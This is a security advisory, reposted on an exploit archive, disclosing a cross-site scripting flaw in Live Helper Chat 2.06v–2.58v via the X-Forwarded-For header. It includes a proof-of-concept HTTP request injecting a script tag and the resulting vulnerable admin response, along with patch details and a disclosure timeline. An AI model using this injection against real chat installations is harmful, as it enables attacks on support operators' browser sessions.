Exploit the possiblities

Live Helper Chat 2.58v Cross Site Scripting

Live Helper Chat 2.58v Cross Site Scripting
Posted Apr 27, 2017
Authored by Sylvain Heiniger

Live Helper Chat versions 2.06v through 2.58v suffer from a cross site scripting vulnerability.

tags | exploit, xss
MD5 | eac74b8c82e6af650a63fda1f1be2590

Live Helper Chat 2.58v Cross Site Scripting

Change Mirror Download
#############################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/en/research/advisories/
#############################################################
#
# CSNC ID: CSNC-2017-004
# Product: Live Helper Chat [1]
# Vendor: Live Helper Chat
# Subject: Cross-Site Scripting - XSS
# Risk: High
# Effect: Remotely exploitable
# Author: Sylvain Heiniger (sylvain.heiniger@compass-security.com)
# Date: April 24, 2017
#
#############################################################


Introduction:
----------------
Live Helper Chat is a live chat support for websites. It provides a simple
solution for companies to get in contact with visitors of their websites. [1]

Compass Security discovered a web application security flaw in the Live
Helper Chat application which allows an attacker to execute JavaScript code in
the browser of a user. This allows, for instance, attacking the user's browser
or redirecting the user to a phishing website. The attack will be in some cases
automatically run in the backend operator's session. Otherwise, one can send
the victim a link to the website with the malicious payload.


Affected Versions:
-----------------------
The following Live Helper Chat versions are vulnerable:
- 2.06v - 2.58v [2]


Patches:
-----------
Live Helper Chat released a patch as part of release 2.60v [3, 4].


Technical Description:
-----------------------------
Live Helper Chat detects the visitor's IP address. To this end, it reads the
"X-Forwarded-For" HTTP header. Any visitor can inject a <script> tag in this
header. It will be reflected in the administrator's "online users" information
page as well as in the "print chat" page.

User's request:
===============
POST /lhc_web/index.php/chat/chatwidget/(vid)/47428qicplsqmfe9huq2/(leaveamessage)/true HTTP/1.1
Host: localhost
X-Forwarded-For: <script>alert(1);</script>
Connection: close
Content-Length: 188

Username=Example&Question=My+question&user_timezone=2&URLRefer=%2F%2Flocalhost%2F&r=&operator=0&StartChat=1&captcha_1977271e431742414c31477d258028664d713ae0=1475518554&tscaptcha=1475518554
===============

Subsequent request to the online users page /lhc_web/index.php/site_admin/chat/onlineusers/(method)/ajax/(timeout)/3600/(maxrows)/50 will be responded with:
===============
[{"id":"1","ip":"<script>alert(1);<\/script>","vid":"47428qicplsqmfe9huq2", [JSON MESSAGE CUT]
===============

Note: the above JSON response is sent by the application with the content-type text/html,
making it vulnerable to XSS as is.


Milestones:
---------------
2017-03-14: Vulnerability discovered
2017-04-23: Vendor notified
2017-04-23: Vendor provided patched version
2017-04-28: Public disclosure


References:
---------------
[1] https://github.com/LiveHelperChat/livehelperchat/
[2] https://github.com/LiveHelperChat/livehelperchat/commit/f93d092c634f52098d578883ef8d069313d460ec
[3] https://livehelperchat.com/new-version-2.60v-security-update-460a.html
[4] https://github.com/LiveHelperChat/livehelperchat/commit/eee03f77f3f51fed613c5e306152ea60255edba2

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

February 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    15 Files
  • 2
    Feb 2nd
    15 Files
  • 3
    Feb 3rd
    15 Files
  • 4
    Feb 4th
    13 Files
  • 5
    Feb 5th
    16 Files
  • 6
    Feb 6th
    15 Files
  • 7
    Feb 7th
    15 Files
  • 8
    Feb 8th
    15 Files
  • 9
    Feb 9th
    18 Files
  • 10
    Feb 10th
    8 Files
  • 11
    Feb 11th
    8 Files
  • 12
    Feb 12th
    17 Files
  • 13
    Feb 13th
    15 Files
  • 14
    Feb 14th
    15 Files
  • 15
    Feb 15th
    17 Files
  • 16
    Feb 16th
    18 Files
  • 17
    Feb 17th
    37 Files
  • 18
    Feb 18th
    2 Files
  • 19
    Feb 19th
    16 Files
  • 20
    Feb 20th
    11 Files
  • 21
    Feb 21st
    3 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close